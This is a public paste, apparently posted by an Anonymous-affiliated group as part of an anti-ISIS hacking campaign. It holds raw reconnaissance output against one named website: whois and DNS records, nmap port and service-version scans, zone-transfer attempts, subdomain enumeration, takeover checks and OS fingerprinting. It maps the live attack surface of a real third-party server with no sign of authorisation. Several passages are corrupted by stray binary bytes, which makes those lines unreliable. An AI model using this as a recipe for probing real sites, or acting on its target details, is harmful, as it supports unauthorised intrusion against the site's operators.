Advertisement
Guest User

Anonymous JTSEC #OPIsis Full Recon #8

a guest
Jun 28th, 2018
1,668
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 107.33 KB | None | 0 0
  1. #######################################################################################################################################
  2. Hostname alfetn.com ISP ColoCrossing
  3. Continent North America Flag
  4. US
  5. Country United States Country Code US
  6. Region New York Local time 28 Jun 2018 07:03 EDT
  7. City Buffalo Postal Code 14202
  8. IP Address 23.94.17.37 Latitude 42.886
  9. Longitude -78.878
  10. #######################################################################################################################################
  11. HostIP:23.94.17.37
  12. HostName:alfetn.com
  13.  
  14. Gathered Inet-whois information for 23.94.17.37
  15. ---------------------------------------------------------------------------------------------------------------------------------------
  16.  
  17.  
  18. inetnum: 23.83.128.0 - 23.105.223.255
  19. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  20. descr: IPv4 address block not managed by the RIPE NCC
  21. remarks: ------------------------------------------------------
  22. remarks:
  23. remarks: You can find the whois server to query, or the
  24. remarks: IANA registry to query on this web page:
  25. remarks: http://www.iana.org/assignments/ipv4-address-space
  26. remarks:
  27. remarks: You can access databases of other RIRs at:
  28. remarks:
  29. remarks: AFRINIC (Africa)
  30. remarks: http://www.afrinic.net/ whois.afrinic.net
  31. remarks:
  32. remarks: APNIC (Asia Pacific)
  33. remarks: http://www.apnic.net/ whois.apnic.net
  34. remarks:
  35. remarks: ARIN (Northern America)
  36. remarks: http://www.arin.net/ whois.arin.net
  37. remarks:
  38. remarks: LACNIC (Latin America and the Carribean)
  39. remarks: http://www.lacnic.net/ whois.lacnic.net
  40. remarks:
  41. remarks: IANA IPV4 Recovered Address Space
  42. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
  43. remarks:
  44. remarks: ------------------------------------------------------
  45. country: EU # Country is really world wide
  46. admin-c: IANA1-RIPE
  47. tech-c: IANA1-RIPE
  48. status: ALLOCATED UNSPECIFIED
  49. mnt-by: RIPE-NCC-HM-MNT
  50. mnt-lower: RIPE-NCC-HM-MNT
  51. mnt-routes: RIPE-NCC-RPSL-MNT
  52. created: 2017-06-06T14:23:16Z
  53. last-modified: 2017-06-06T14:23:16Z
  54. source: RIPE
  55.  
  56. role: Internet Assigned Numbers Authority
  57. address: see http://www.iana.org.
  58. admin-c: IANA1-RIPE
  59. tech-c: IANA1-RIPE
  60. nic-hdl: IANA1-RIPE
  61. remarks: For more information on IANA services
  62. remarks: go to IANA web site at http://www.iana.org.
  63. mnt-by: RIPE-NCC-MNT
  64. created: 1970-01-01T00:00:00Z
  65. last-modified: 2001-09-22T09:31:27Z
  66. source: RIPE # Filtered
  67.  
  68. % This query was served by the RIPE Database Query Service version 1.91.2 (HEREFORD)
  69.  
  70.  
  71.  
  72. Gathered Inic-whois information for alfetn.com
  73. ---------------------------------------------------------------------------------------------------------------------------------------
  74. Domain Name: ALFETN.COM
  75. Registry Domain ID: 131847531_DOMAIN_COM-VRSN
  76. Registrar WHOIS Server: whois.godaddy.com
  77. Registrar URL: http://www.godaddy.com
  78. Updated Date: 2017-08-23T20:52:59Z
  79. Creation Date: 2004-10-05T14:50:10Z
  80. Registry Expiry Date: 2019-10-05T14:50:10Z
  81. Registrar: GoDaddy.com, LLC
  82. Registrar IANA ID: 146
  83. Registrar Abuse Contact Email: abuse@godaddy.com
  84. Registrar Abuse Contact Phone: 480-624-2505
  85. Domain Status: ok https://icann.org/epp#ok
  86. Name Server: NS1.ALFETN.COM
  87. Name Server: NS2.ALFETN.COM
  88. DNSSEC: unsigned
  89. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  90. >>> Last update of whois database: 2018-06-28T11:06:21Z <<<
  91.  
  92. For more information on Whois status codes, please visit https://icann.org/epp
  93.  
  94. NOTICE: The expiration date displayed in this record is the date the
  95. registrar's sponsorship of the domain name registration in the registry is
  96. currently set to expire. This date does not neceYV@ssariFZV�lyT refle��j1�ctXV@ the ��j1�exgV@pirat��������ion
  97. date of the domain name registrant's agreement with the sponsoring
  98. registrar. Users may consult the sponsoring registrar's Whois database to
  99. view the registrar's reported date of expiration for this registration.
  100.  
  101. TERMS OF USE: You are not authorized to access or query our Whois
  102. database through the use of electronic processes�U@ that�]V� aRre hig4�j1�h-U@volum:�j1�e �U@and
  103. automated except as reasonably necessary to register domain names or
  104. modify existing registrations; the Data in VeriSign Global Registry
  105. Services' ("VeriSign") Whois database is provided by VeriSign for
  106. information purposes only, and to assist persons in obtaining information
  107. about or related to a domain name registration record. VeriSign does not
  108. guarantee its accuracy. By submitting a Whois query, you agree to abide
  109. by the following terms of use: You agree that yo�U@u may�]V� u�se thi¢j1�s U@Data Ȣj1�on�U@ly
  110. for lawful purposes and that under no circumstances will you use this Data
  111. to: (1) allow, enable, or otherwise support the transmission of mass
  112. unsolicited, commercial advertising or solicitations via e-mail, telephone,
  113. or facsimile; or (2) enable high volume, automated, electronic processes
  114. that apply to VeriSign (or its computer systems). The compilation,
  115. repackaging, dissemination or other use of this Data is expressly
  116. prohibited without the prior written consent of YV@VeriSFZV�ig�n. You��j1� aXV@gree ��j1��������to
  117. use electronic processes that are automated and high-volume to access or
  118. query the Whois database except as reasonably necessary to register
  119. domain names or modify existing registrations. VeriSign reserves the right
  120. to restrict your access to the Whois database in its sole discretion to ensure
  121. operational stability. VeriSign may restrict or terminate your access to the
  122. Whois database for failure to abide by these ter�U@ use.�]V� VeriSign
  123. �j1�
  124. reserves the right to modify these terms at any time.
  125.  
  126. The Registry database contains ONLY .COM, .NET, .EDU domains and
  127. Registrars.
  128.  
  129. Gathered Netcraft information for alfetn.com
  130. ---------------------------------------------------------------------------------------------------------------------------------------
  131.  
  132. Retrieving Netcraft.com information for alfetn.com
  133. Netcraft.com Information gathered
  134.  
  135. Gathered Subdomain information for alfetn.com
  136. ---------------------------------------------------------------------------------------------------------------------------------------
  137. Searching Google.com:80...
  138. HostName:www.alfetn.com
  139. HostIP:23.94.17.37
  140. Searching Altavista.com:80...
  141. Found 1 possible subdomain(s) for host alfetn.com, Searched 0 pages containing 0 results
  142.  
  143. Gathered E-Mail information for alfetn.com
  144. ---------------------------------------------------------------------------------------------------------------------------------------
  145. Searching Google.com:80...
  146. Searching Altavista.com:80...
  147. Found 0 E-Mail(s) for host alfetn.com, Searched 0 pages containing 0 results
  148.  
  149. Gathered TCP Port information for 23.94.17.37
  150. ---------------------------------------------------------------------------------------------------------------------------------------
  151.  
  152. Port State
  153.  
  154. 21/tcp open
  155. 53/tcp open
  156. 80/tcp open
  157. 110/tcp open
  158. 143/tcp open
  159.  
  160. Portscan Finished: Scanned 150 ports, 138 ports were in state closed
  161. #######################################################################################################################################
  162. [i] Scanning Site: http://alfetn.com
  163.  
  164.  
  165.  
  166. B A S I C I N F O
  167. =======================================================================================================================================
  168.  
  169.  
  170. [+] Site Title: &THORN;&Ntilde;&iacute;&Egrave;&Ccedil;&eth; &atilde;&auml;&Ecirc;&Iuml;&iacute;&Ccedil;&Ecirc; &Ccedil;&aacute;&atilde;&aacute;&Ccedil;&Iacute;&atilde; &aelig; &Ccedil;&aacute;&Yacute;&Ecirc;&auml;
  171. [+] IP address: 23.94.17.37
  172. [+] Web Server: nginx admin
  173. [+] CMS: Could Not Detect
  174. [+] Cloudflare: Not Detected
  175. [+] Robots File: Could NOT Find robots.txt!
  176.  
  177.  
  178.  
  179.  
  180. W H O I S L O O K U P
  181. =======================================================================================================================================
  182.  
  183. Domain Name: ALFETN.COM
  184. Registry Domain ID: 131847531_DOMAIN_COM-VRSN
  185. Registrar WHOIS Server: whois.godaddy.com
  186. Registrar URL: http://www.godaddy.com
  187. Updated Date: 2017-08-23T20:52:59Z
  188. Creation Date: 2004-10-05T14:50:10Z
  189. Registry Expiry Date: 2019-10-05T14:50:10Z
  190. Registrar: GoDaddy.com, LLC
  191. Registrar IANA ID: 146
  192. Registrar Abuse Contact Email: abuse@godaddy.com
  193. Registrar Abuse Contact Phone: 480-624-2505
  194. Domain Status: ok https://icann.org/epp#ok
  195. Name Server: NS1.ALFETN.COM
  196. Name Server: NS2.ALFETN.COM
  197. DNSSEC: unsigned
  198. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  199. >>> Last update of whois database: 2018-06-28T11:06:52Z <<<
  200.  
  201. For more information on Whois status codes, please visit https://icann.org/epp
  202.  
  203. NOTICE: The expiration date displayed in this record is the date the
  204. registrar's sponsorship of the domain name registration in the registry is
  205. currently set to expire. This date does not necessarily reflect the expiration
  206. date of the domain name registrant's agreement with the sponsoring
  207. registrar. Users may consult the sponsoring registrar's Whois database to
  208. view the registrar's reported date of expiration for this registration.
  209.  
  210.  
  211. The Registry database contains ONLY .COM, .NET, .EDU domains and
  212. Registrars.
  213.  
  214.  
  215.  
  216.  
  217. G E O I P L O O K U P
  218. =======================================================================================================================================
  219.  
  220. [i] IP Address: 23.94.17.37
  221. [i] Country: US
  222. [i] State: New York
  223. [i] City: Buffalo
  224. [i] Latitude: 42.886398
  225. [i] Longitude: -78.878098
  226.  
  227.  
  228.  
  229.  
  230. H T T P H E A D E R S
  231. =======================================================================================================================================
  232.  
  233.  
  234. [i] HTTP/1.1 200 OK
  235. [i] Server: nginx admin
  236. [i] Date: Thu, 28 Jun 2018 11:06:22 GMT
  237. [i] Content-Type: text/html
  238. [i] Content-Length: 38710
  239. [i] Connection: close
  240. [i] Vary: Accept-Encoding
  241. [i] Last-Modified: Wed, 28 Sep 2011 17:56:17 GMT
  242. [i] X-Cache: HIT from Backend
  243. [i] Accept-Ranges: bytes
  244.  
  245.  
  246.  
  247.  
  248. D N S L O O K U P
  249. =======================================================================================================================================
  250.  
  251. ;; Truncated, retrying in TCP mode.
  252. alfetn.com. 14400 IN TXT "v=spf1 ip4:23.94.17.37 ip4:192.3.138.116 +a +mx ~all"
  253. alfetn.com. 14400 IN MX 0 alfetn.com.
  254. alfetn.com. 86400 IN SOA ns1.alfetn.com. monitor.sawa4.com. 2016080100 3600 7200 1209600 86400
  255. alfetn.com. 86400 IN NS ns1.alfetn.com.
  256. alfetn.com. 86400 IN NS ns2.alfetn.com.
  257. alfetn.com. 14400 IN A 23.94.17.37
  258.  
  259.  
  260.  
  261.  
  262. S U B N E T C A L C U L A T I O N
  263. =======================================================================================================================================
  264.  
  265. Address = 23.94.17.37
  266. Network = 23.94.17.37 / 32
  267. Netmask = 255.255.255.255
  268. Broadcast = not needed on Point-to-Point links
  269. Wildcard Mask = 0.0.0.0
  270. Hosts Bits = 0
  271. Max. Hosts = 1 (2^0 - 0)
  272. Host Range = { 23.94.17.37 - 23.94.17.37 }
  273.  
  274.  
  275.  
  276. N M A P P O R T S C A N
  277. =======================================================================================================================================
  278.  
  279.  
  280. Starting Nmap 7.01 ( https://nmap.org ) at 2018-06-28 11:07 UTC
  281. Nmap scan report for alfetn.com (23.94.17.37)
  282. Host is up (0.026s latency).
  283. rDNS record for 23.94.17.37: host.colocrossing.com
  284. PORT STATE SERVICE VERSION
  285. 21/tcp open ftp Pure-FTPd
  286. 22/tcp closed ssh
  287. 23/tcp closed telnet
  288. 80/tcp open http nginx
  289. 110/tcp open pop3 Dovecot pop3d
  290. 143/tcp open imap Dovecot imapd
  291. 443/tcp open https?
  292. 3389/tcp closed ms-wbt-server
  293.  
  294. #######################################################################################################################################
  295. [?] Enter the target: http://alfetn.com/
  296. [!] IP Address : 23.94.17.37
  297. [!] Server: nginx admin
  298. [+] Clickjacking protection is not in place.
  299. [!] CMS Detected : FrontPage
  300. [+] Honeypot Probabilty: 30%
  301. ---------------------------------------------------------------------------------------------------------------------------------------
  302. [~] Trying to gather whois information for alfetn.com
  303. [+] Whois information found
  304. Updated Date : 2017-08-23 20:52:59
  305. Status : ok https://icann.org/epp#ok, ok http://www.icann.org/epp#ok
  306. Name : None
  307. Dnssec : unsigned
  308. City : None
  309. Expiration Date : 2019-10-05 14:50:10
  310. Address : None
  311. Zipcode : None
  312. Domain Name : ALFETN.COM
  313. Whois Server : whois.godaddy.com
  314. State : None
  315. Registrar : GoDaddy.com, LLC
  316. Referral Url : None
  317. Country : om
  318. Name Servers : NS1.ALFETN.COM, NS2.ALFETN.COM
  319. Org : None
  320. Creation Date : 2004-10-05 14:50:10
  321. Emails : abuse@godaddy.com
  322. ---------------------------------------------------------------------------------------------------------------------------------------
  323. PORT STATE SERVICE VERSION
  324. 21/tcp open ftp Pure-FTPd
  325. 22/tcp closed ssh
  326. 23/tcp closed telnet
  327. 80/tcp open http nginx
  328. 110/tcp open pop3 Dovecot pop3d
  329. 143/tcp open imap Dovecot imapd
  330. 443/tcp open https?
  331. 3389/tcp closed ms-wbt-server
  332.  
  333. [+] DNS Records
  334. ns1.alfetn.com. (23.94.17.37) AS36352 ColoCrossing United States
  335. ns2.alfetn.com. (172.245.104.110) AS36352 ColoCrossing United States
  336.  
  337. [+] MX Records
  338. 0 (23.94.17.37) AS36352 ColoCrossing United States
  339.  
  340. [+] Host Records (A)
  341. alfetn.comHTTP: (host.colocrossing.com) (23.94.17.37) AS36352 ColoCrossing United States
  342.  
  343. [+] TXT Records
  344. "v=spf1 ip4:23.94.17.37 ip4:192.3.138.116 +a +mx ~all"
  345.  
  346. [+] DNS Map: https://dnsdumpster.com/static/map/alfetn.com.png
  347.  
  348. [>] Initiating 3 intel modules
  349. [>] Loading Alpha module (1/3)
  350. [>] Beta module deployed (2/3)
  351. [>] Gamma module initiated (3/3)
  352.  
  353.  
  354. [+] Emails found:
  355. ---------------------------------------------------------------------------------------------------------------------------------------
  356. pixel-153018410629336-web-@alfetn.com
  357.  
  358. [+] Hosts found in search engines:
  359. ---------------------------------------------------------------------------------------------------------------------------------------
  360. [-] Resolving hostnames IPs...
  361. 172.245.104.110:Ns2.alfetn.com
  362. 23.94.17.37:ns1.alfetn.com
  363. 172.245.104.110:ns2.alfetn.com
  364. 23.94.17.37:www.alfetn.com
  365. [+] Virtual hosts:
  366. ---------------------------------------------------------------------------------------------------------------------------------------
  367. [~] Crawling the target for fuzzable URLs
  368. [-] No fuzzable URLs found
  369. #######################################################################################################################################
  370. Server: 10.211.254.254
  371. Address: 10.211.254.254#53
  372.  
  373. Non-authoritative answer:
  374. Name: alfetn.com
  375. Address: 23.94.17.37
  376.  
  377. alfetn.com has address 23.94.17.37
  378. alfetn.com mail is handled by 0 alfetn.com.
  379. #######################################################################################################################################
  380. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  381.  
  382. [+] Target is alfetn.com
  383. [+] Loading modules.
  384. [+] Following modules are loaded:
  385. [x] [1] ping:icmp_ping - ICMP echo discovery module
  386. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  387. [x] [3] ping:udp_ping - UDP-based ping discovery module
  388. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  389. [x] [5] infogather:portscan - TCP and UDP PortScanner
  390. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  391. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  392. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  393. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  394. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  395. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  396. [x] [12] fingerprint:smb - SMB fingerprinting module
  397. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  398. [+] 13 modules registered
  399. [+] Initializing scan engine
  400. [+] Running scan engine
  401. [-] ping:tcp_ping module: no closed/open TCP ports known on 23.94.17.37. Module test failed
  402. [-] ping:udp_ping module: no closed/open UDP ports known on 23.94.17.37. Module test failed
  403. [-] No distance calculation. 23.94.17.37 appears to be dead or no ports known
  404. [+] Host: 23.94.17.37 is up (Guess probability: 50%)
  405. [+] Target: 23.94.17.37 is alive. Round-Trip Time: 1.00364 sec
  406. [+] Selected safe Round-Trip Time value is: 2.00727 sec
  407. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  408. [-] fingerprint:smb need either TCP port 139 or 445 to run
  409. [+] Primary guess:
  410. [+] Host 23.94.17.37 Running OS: 0ZQ)�U (Guess probability: 88%)
  411. [+] Other guesses:
  412. [+] Host 23.94.17.37 Running OS: 0ZQ)�U (Guess probability: 88%)
  413. [+] Host 23.94.17.37 Running OS: 0ZQ)�U (Guess probability: 88%)
  414. [+] Host 23.94.17.37 Running OS: 0ZQ)�U (Guess probability: 88%)
  415. [+] Host 23.94.17.37 Running OS: 0ZQ)�U (Guess probability: 88%)
  416. [+] Host 23.94.17.37 Running OS: 0ZQ)�U (Guess probability: 88%)
  417. [+] Host 23.94.17.37 Running OS: 0ZQ)�U (Guess probability: 88%)
  418. [+] Host 23.94.17.37 Running OS: 0ZQ)�U (Guess probability: 88%)
  419. [+] Host 23.94.17.37 Running OS: 0ZQ)�U (Guess probability: 88%)
  420. [+] Host 23.94.17.37 Running OS: 0ZQ)�U (Guess probability: 88%)
  421. [+] Cleaning up scan engine
  422. [+] Modules deinitialized
  423. [+] Execution completed.
  424. #######################################################################################################################################
  425. Domain Name: ALFETN.COM
  426. Registry Domain ID: 131847531_DOMAIN_COM-VRSN
  427. Registrar WHOIS Server: whois.godaddy.com
  428. Registrar URL: http://www.godaddy.com
  429. Updated Date: 2017-08-23T20:52:59Z
  430. Creation Date: 2004-10-05T14:50:10Z
  431. Registry Expiry Date: 2019-10-05T14:50:10Z
  432. Registrar: GoDaddy.com, LLC
  433. Registrar IANA ID: 146
  434. Registrar Abuse Contact Email: abuse@godaddy.com
  435. Registrar Abuse Contact Phone: 480-624-2505
  436. Domain Status: ok https://icann.org/epp#ok
  437. Name Server: NS1.ALFETN.COM
  438. Name Server: NS2.ALFETN.COM
  439. DNSSEC: unsigned
  440. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  441. >>> Last update of whois database: 2018-06-28T11:06:36Z <<<
  442.  
  443. For more information on Whois status codes, please visit https://icann.org/epp
  444.  
  445. NOTICE: The expiration date displayed in this record is the date the
  446. registrar's sponsorship of the domain name registration in the registry is
  447. currently set to expire. This date does not necessarily reflect the expiration
  448. date of the domain name registrant's agreement with the sponsoring
  449. registrar. Users may consult the sponsoring registrar's Whois database to
  450. view the registrar's reported date of expiration for this registration.
  451.  
  452. TERMS OF USE: You are not authorized to access or query our Whois
  453. database through the use of electronic processes that are high-volume and
  454. automated except as reasonably necessary to register domain names or
  455. modify existing registrations; the Data in VeriSign Global Registry
  456. Services' ("VeriSign") Whois database is provided by VeriSign for
  457. information purposes only, and to assist persons in obtaining information
  458. about or related to a domain name registration record. VeriSign does not
  459. guarantee its accuracy. By submitting a Whois query, you agree to abide
  460. by the following terms of use: You agree that you may use this Data only
  461. for lawful purposes and that under no circumstances will you use this Data
  462. to: (1) allow, enable, or otherwise support the transmission of mass
  463. unsolicited, commercial advertising or solicitations via e-mail, telephone,
  464. or facsimile; or (2) enable high volume, automated, electronic processes
  465. that apply to VeriSign (or its computer systems). The compilation,
  466. repackaging, dissemination or other use of this Data is expressly
  467. prohibited without the prior written consent of VeriSign. You agree not to
  468. use electronic processes that are automated and high-volume to access or
  469. query the Whois database except as reasonably necessary to register
  470. domain names or modify existing registrations. VeriSign reserves the right
  471. to restrict your access to the Whois database in its sole discretion to ensure
  472. operational stability. VeriSign may restrict or terminate your access to the
  473. Whois database for failure to abide by these terms of use. VeriSign
  474. reserves the right to modify these terms at any time.
  475.  
  476. The Registry database contains ONLY .COM, .NET, .EDU domains and
  477. Registrars.
  478. Domain Name: ALFETN.COM
  479. Registry Domain ID: 131847531_DOMAIN_COM-VRSN
  480. Registrar WHOIS Server: whois.godaddy.com
  481. Registrar URL: http://www.godaddy.com
  482. Updated Date: 2017-08-23T20:52:59Z
  483. Creation Date: 2004-10-05T14:50:10Z
  484. Registrar Registration Expiration Date: 2019-10-05T14:50:10Z
  485. Registrar: GoDaddy.com, LLC
  486. Registrar IANA ID: 146
  487. Registrar Abuse Contact Email: abuse@godaddy.com
  488. Registrar Abuse Contact Phone: +1.4806242505
  489. Domain Status: ok http://www.icann.org/epp#ok
  490. Registrant Organization:
  491. Registrant State/Province:
  492. Registrant Country: om
  493. Name Server: NS1.ALFETN.COM
  494. Name Server: NS2.ALFETN.COM
  495. DNSSEC: unsigned
  496. URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
  497. >>> Last update of WHOIS database: 2018-06-28T11:00:00Z <<<
  498.  
  499. For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
  500.  
  501. Notes:
  502.  
  503. IMPORTANT: Port43 will provide the ICANN-required minimum data set per
  504. ICANN Temporary Specification, adopted 17 May 2018.
  505. Visit https://whois.godaddy.com to look up contact data for domains
  506. not covered by GDPR policy.
  507.  
  508. The data contained in GoDaddy.com, LLC's WhoIs database,
  509. while believed by the company to be reliable, is provided "as is"
  510. with no guarantee or warranties regarding its accuracy. This
  511. information is provided for the sole purpose of assisting you
  512. in obtaining information about domain name registration records.
  513. Any use of this data for any other purpose is expressly forbidden without the prior written
  514. permission of GoDaddy.com, LLC. By submitting an inquiry,
  515. you agree to these terms of usage and limitations of warranty. In particular,
  516. you agree not to use this data to allow, enable, or otherwise make possible,
  517. dissemination or collection of this data, in part or in its entirety, for any
  518. purpose, such as the transmission of unsolicited advertising and
  519. and solicitations of any kind, including spam. You further agree
  520. not to use this data to enable high volume, automated or robotic electronic
  521. processes designed to collect or compile this data for any purpose,
  522. including mining this data for your own personal or commercial purposes.
  523.  
  524. Please note: the registrant of the domain name is specified
  525. in the "registrant" section. In most cases, GoDaddy.com, LLC
  526. is not the registrant of domain names listed in this database.
  527. #######################################################################################################################################
  528. ; <<>> DiG 9.11.3-2-Debian <<>> -x alfetn.com
  529. ;; global options: +cmd
  530. ;; Got answer:
  531. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 31823
  532. ;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  533.  
  534. ;; OPT PSEUDOSECTION:
  535. ; EDNS: version: 0, flags:; udp: 512
  536. ;; QUESTION SECTION:
  537. ;com.alfetn.in-addr.arpa. IN PTR
  538.  
  539. ;; AUTHORITY SECTION:
  540. in-addr.arpa. 3599 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2018013437 1800 900 604800 3600
  541.  
  542. ;; Query time: 432 msec
  543. ;; SERVER: 10.211.254.254#53(10.211.254.254)
  544. ;; WHEN: Thu Jun 28 07:06:48 EDT 2018
  545. ;; MSG SIZE rcvd: 120
  546.  
  547. dnsenum VERSION:1.2.4
  548.  
  549. ----- alfetn.com -----
  550.  
  551.  
  552. Host's addresses:
  553. __________________
  554.  
  555. alfetn.com. 14399 IN A 23.94.17.37
  556.  
  557.  
  558. Name Servers:
  559. ______________
  560.  
  561. ns2.alfetn.com. 14399 IN A 172.245.104.110
  562. ns1.alfetn.com. 14399 IN A 23.94.17.37
  563.  
  564.  
  565. Mail (MX) Servers:
  566. ___________________
  567.  
  568. alfetn.com. 14376 IN A 23.94.17.37
  569.  
  570.  
  571. Trying Zone Transfers and getting Bind Versions:
  572. _________________________________________________
  573.  
  574.  
  575. Trying Zone Transfer for alfetn.com on ns2.alfetn.com ...
  576.  
  577. Trying Zone Transfer for alfetn.com on ns1.alfetn.com ...
  578.  
  579. brute force file not specified, bay.
  580. #######################################################################################################################################
  581. [-] Enumerating subdomains now for alfetn.com
  582. [-] verbosity is enabled, will show the subdomains results in realtime
  583. [-] Searching now in Baidu..
  584. [-] Searching now in Yahoo..
  585. [-] Searching now in Google..
  586. [-] Searching now in Bing..
  587. [-] Searching now in Ask..
  588. [-] Searching now in Netcraft..
  589. [-] Searching now in DNSdumpster..
  590. [-] Searching now in Virustotal..
  591. [-] Searching now in ThreatCrowd..
  592. [-] Searching now in SSL Certificates..
  593. [-] Searching now in PassiveDNS..
  594. Virustotal: www.alfetn.com
  595. Virustotal: ns1.alfetn.com
  596. Virustotal: ns2.alfetn.com
  597. Yahoo: www.alfetn.com
  598. [-] Saving results to file: /usr/share/sniper/loot/alfetn.com/domains/domains-alfetn.com.txt
  599. [-] Total Unique Subdomains Found: 3
  600. www.alfetn.com
  601. ns1.alfetn.com
  602. ns2.alfetn.com
  603. #######################################################################################################################################
  604. alfetn.com. 1799 IN SOA ns1.alfetn.com. monitor.sawa4.com. 2016080100 3600 7200 1209600 86400
  605. alfetn.com. 1799 IN SOA ns1.alfetn.com. monitor.sawa4.com. 2016080100 3600 7200 1209600 86400
  606. alfetn.com. 1799 IN SOA ns1.alfetn.com. monitor.sawa4.com. 2016080100 3600 7200 1209600 86400
  607. #######################################################################################################################################
  608. __
  609. ____ _____ ___ ______ _/ /_____ ____ ___
  610. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  611. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  612. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  613. /_/ discover v0.5.0 - by @michenriksen
  614.  
  615. Identifying nameservers for alfetn.com... Done
  616. Using nameservers:
  617.  
  618. - 23.94.17.37
  619. - 172.245.104.110
  620.  
  621. Checking for wildcard DNS... Done
  622.  
  623. Running collector: PassiveTotal... Skipped
  624. -> Key 'passivetotal_key' has not been set
  625. Running collector: Certificate Search... Done (0 hosts)
  626. Running collector: DNSDB... Done (4 hosts)
  627. Running collector: Riddler... Skipped
  628. -> Key 'riddler_username' has not been set
  629. Running collector: Threat Crowd... Done (0 hosts)
  630. Running collector: Dictionary... Done (27 hosts)
  631. Running collector: PTRArchive... Error
  632. -> PTRArchive returned unexpected response code: 404
  633. Running collector: Wayback Machine... Done (2 hosts)
  634. Running collector: Censys... Skipped
  635. -> Key 'censys_secret' has not been set
  636. Running collector: PublicWWW... Done (0 hosts)
  637. Running collector: HackerTarget... Done (1 host)
  638. Running collector: Google Transparency Report... Done (0 hosts)
  639. Running collector: VirusTotal... Skipped
  640. -> Key 'virustotal' has not been set
  641. Running collector: Shodan... Skipped
  642. -> Key 'shodan' has not been set
  643. Running collector: Netcraft... Done (0 hosts)
  644.  
  645. Resolving 32 unique hosts...
  646. 23.94.17.37 .alfetn.com
  647. 23.94.17.37 alfetn.com
  648. 23.94.17.37 ns1.alfetn.com
  649. 172.245.104.110 ns2.alfetn.com
  650. 23.94.17.37 www.alfetn.com
  651.  
  652. Found subnets:
  653.  
  654. - 23.94.17.0-255 : 4 hosts
  655.  
  656. Wrote 5 hosts to:
  657.  
  658. - file:///root/aquatone/alfetn.com/hosts.txt
  659. - file:///root/aquatone/alfetn.com/hosts.json
  660. __
  661. ____ _____ ___ ______ _/ /_____ ____ ___
  662. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  663. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  664. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  665. /_/ takeover v0.5.0 - by @michenriksen
  666.  
  667. Loaded 5 hosts from /root/aquatone/alfetn.com/hosts.json
  668. Loaded 25 domain takeover detectors
  669.  
  670. Identifying nameservers for alfetn.com... Done
  671. Using nameservers:
  672.  
  673. - 23.94.17.37
  674. - 172.245.104.110
  675.  
  676. Checking hosts for domain takeover vulnerabilities...
  677.  
  678. Finished checking hosts:
  679.  
  680. - Vulnerable : 0
  681. - Not Vulnerable : 5
  682.  
  683. Wrote 0 potential subdomain takeovers to:
  684.  
  685. - file:///root/aquatone/alfetn.com/takeovers.json
  686.  
  687. __
  688. ____ _____ ___ ______ _/ /_____ ____ ___
  689. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  690. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  691. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  692. /_/ scan v0.5.0 - by @michenriksen
  693.  
  694. Loaded 5 hosts from /root/aquatone/alfetn.com/hosts.json
  695.  
  696. Probing 4 ports...
  697. 443/tcp 172.245.104.110 ns2.alfetn.com
  698. 443/tcp 23.94.17.37 alfetn.com, .alfetn.com, www.alfetn.com and 1 more
  699. 80/tcp 23.94.17.37 .alfetn.com, ns1.alfetn.com, alfetn.com and 1 more
  700.  
  701. Wrote open ports to file:///root/aquatone/alfetn.com/open_ports.txt
  702. Wrote URLs to file:///root/aquatone/alfetn.com/urls.txt
  703. __
  704. ____ _____ ___ ______ _/ /_____ ____ ___
  705. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  706. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  707. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  708. /_/ gather v0.5.0 - by @michenriksen
  709. #######################################################################################################################################
  710. ---------------------------------------------------------------------------------------------------------------------------------------
  711.  
  712. Total hosts: 9
  713.  
  714. [-] Resolving hostnames IPs...
  715.  
  716. .alfetn.com : empty
  717. Ns2.alfetn.com : 172.245.104.110
  718. ns1.alfetn.com : 23.94.17.37
  719. ns2.alfetn.com : 172.245.104.110
  720. www.alfetn.com : 23.94.17.37
  721. #######################################################################################################################################
  722. Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-28 07:13 EDT
  723. Warning: 23.94.17.37 giving up on port because retransmission cap hit (2).
  724. Nmap scan report for alfetn.com (23.94.17.37)
  725. Host is up (0.46s latency).
  726. rDNS record for 23.94.17.37: host.colocrossing.com
  727. Not shown: 458 closed ports, 6 filtered ports
  728. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  729. PORT STATE SERVICE
